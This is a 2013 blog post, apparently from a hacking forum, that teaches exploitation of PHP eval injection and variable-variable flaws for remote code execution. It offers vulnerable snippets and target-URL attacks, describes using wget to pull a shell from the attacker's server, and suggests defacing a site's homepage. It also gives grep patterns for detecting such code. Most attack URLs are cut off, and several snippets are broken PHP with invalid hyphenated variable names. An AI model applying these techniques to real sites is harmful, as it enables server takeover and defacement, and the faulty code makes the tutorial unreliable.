How to exploit Dynamic Evaluation Variables in PHP applications.
Today I will be explaining how to exploit Dynamic Evaluation Variables in PHP applications. As you may already know there are billions of sites coded in PHP, even the top CMS softwares, such as Wordpress, MyBB, Joomla, etc.. Exploiting a dynamic evaluation variable can lead to what is know as a RCE (Remote Code Execution Attack), which allows execution of arbitrary code or arbitrary functions, or even read/write access of arbitrary internal variables on the server. This type of attack can also lead to 0days in software and applications. An example of this would be the RCE I found in an uploading software named SPAW. You can view my threads and see what was possible with this 0day in under an hour
Code:
Quick Note: These types of vulnerabilities are non unique to PHP, and other interpreted languages have similar issues. For Example, Python, Perl, and Java script all have eval functions too.
[0X2]: Eval Injection (Simple):
[*] An eval injection vulnerability, also know as RCE occurs when an attacker can control all or part of an input string thats is fed into an eval() function call. This was what I used to exploit the SPAW software, using a Java script eval() call function, that was executing and unsanitized variable. The Eval() Function will execute the argument code on the local system and this is how a remote code execution attack happens.
Example:
Code:
$common-variable = "command";
$x = $_GET['arg'];
eval("\$common-variable = \$x;");
[*] Analysis:
As you can see the $common-variable, variable isn't sanitized. Meaning an attacker can escape the quotes and provide his own input. To verify this, we look at the second line and see that in-fact the application is allowing user input and using $GET to send the data to the application and server for execution. Next we look at the third line and see the eval() function being called. This will execute the 2 strings given above. Well, only one string because they are being set = to each other. Confusing? Well Here is a simple example and how you would go about exploiting it on a remote server.
[*] Example:
Say you server is running a script and you was able to gain access to the file using LFI, with php://filter attack to read source code and you discovered and eval function like this:
Code:
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>
* Well, to exploit this you would go to the script path in url and get the "cmd" variable, like this:
Code:
http://www.target.com/
* The above attack would execute the wget command which would download my shell from our remote server. Thats a simple example of eval injection, just to help you grasp whats going on
[0x3]: Dynamic Variable Evaluation:
[*] Okay so many hackers/programmers love PHP. Its a simple but powerful language that comes with a lot of heart warming and life saving functions. These also can be the causes of all your hard work being destroyed in a matter of seconds after publishing your site to the web. PHP supports "variable variables," which are variables or expressions that evaluate to the names of other variables. <-- Just think about that and tell me that doesn't spell trouble D: These expressions can be used to dynamically change which variable is accessed or set during the execution of the program. Sounds so convenient but then again think of that and you will be thinking that this is insecure lol If the variable name is not controlled or sanitized an attacker can read or write arbitrary variables, causing yet another remote code execution.
[*] Example:
Code:
$varname = "myvar";
$$varname = 10;
echo $myvar;
[*] Analysis:
This will set $myvar, and print the string "10"!!!!! Lets simplify this into a real world situation:
[*] Real World Situation:
Code:
$safevar = "Welcome to my site";
$param1 = "";
$param2 = "";
$param3 = "";
# my own "register globals" for param[1,2,3]
foreach ($_GET as $key => $value) {
$$key = $value;
echo $value;
}
[*] Analysis:
As you can see the site would echo or print, "Welcome to my site". Now if an attacker wanted to exploit this, he could set the $safevar variable to something like "echo Hacked By Legit >> /home/var/www/public_html/
Code:
http://www.target.com/
* Which would pipe the echo statement to the homepage if you had the full path. If "echo $value" was an eval() function instead, exploitation would be the same way. Just enter your command in the url and set it as the $safevar variable.
[*] How to Detect Dynamic Variable Evaluation:
To detect these in source code you can use your favorite text editor and use the find function or me personally I use grep to find these variables. But you would search for:
Detection Examples:
$$varname
${$varname}
${$var . $name}
${arbitrary expression}
* Search for common expression such as $$ and ${ or ${$ .
[0x4]: Dynamic Function Evaluation:
[*] Just like dynamic variable evaluation, dynamic function evaluation revolves around "variable variables" that can be used to dynamically reference functions.
[*] Example:
Code:
$function-name = "myfunction";
$Arg1 = "hello";
$Arg2 = "welcome to my site";
$$function-name("Arg1", "Arg2");
echo $myfunction;
[*] Analysis:
The code above is just like exploiting dynamic variable evaluation except this time, your exploiting an entire function so you may have to rewrite that function in your url to get the command to pass. The above code effectively calls myfunction("Arg1", "Arg2") and will give you the output of "hello welcome to my site"!
[*] Exploitation:
Code:
$function-name = "myfunction";
$Arg1 = "echo 'hello'";
$Arg2 = "echo 'welcome to my site'";
$$function-name("Arg1", "Arg2");
eval($myfunction);
Code:
http://www.target.com/
Code:
http://www.target.com/
Code:
http://www.target.com/
* Exploiting this means that you know the function $myfunction is going to execute not one argument but two. So if we tried to bypass $Arg1 to execute our command, $Arg2 would still be executing as well and could give us a messy output or wouldn't execute our command. So in order to do execute our command we would have to rewrite the function.
* The first example, since it just echo's a single word we will just allow it to echo hello into our output and just discard it when reviewing the data. Wouldn't advise this if, the function was more complex.
* The second example, we use to null the variable out and discard it, in order just to have the second argument ($Arg2) be executed. This is sketchy sometimes, wouldn't really recommend this either.
* The third example is very solid and what I go with just about every time. We use ; to close the statement. Just like you see in every line of code, there is a ; behind it to start a new line or end that statement. By using Arg1=; the variable is left empty and is given nothing to execute.
[*] How to Detect Dynamic Function Evaluation:
Detection Examples:
$$fname();
${$var1 . $var2} ("arg");
${"varname"} ();
* Search for commonly used expressions like $$ and ${ or ${" .
[0x5] Conclusion:
[*] Well thats about all there is to exploiting dynamic evaluation in PHP and other scripting language applications. I hope to clean this section up more and provide more in depth tutorials for CHF. This section is in need of great knowledge and I don't mean you have sqli and xss down. The section is lacking of learning, very few have the will to explore knew things and test their skills and knowledge. If anyone else is with me and think the same, please help me and rynaldo and others clean up this section and push the hackers of CHF to learn new things. If we do this, we will draw more attention to CHF, and more members will come if other hackers see the knowledge and greatness coming from our forum. I worked a good bit on this to perfect it and give examples so please don't junk this or let it have 0 replies and 80 views. Thats just pathetic, to let someone's hard work just be trashed like that. So give me a like, shoutout, thank you, send me questions about the topic, anything. Just as long as you learn something new.
posted by buznorpoor @ May 17, 2013
0 Comments
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home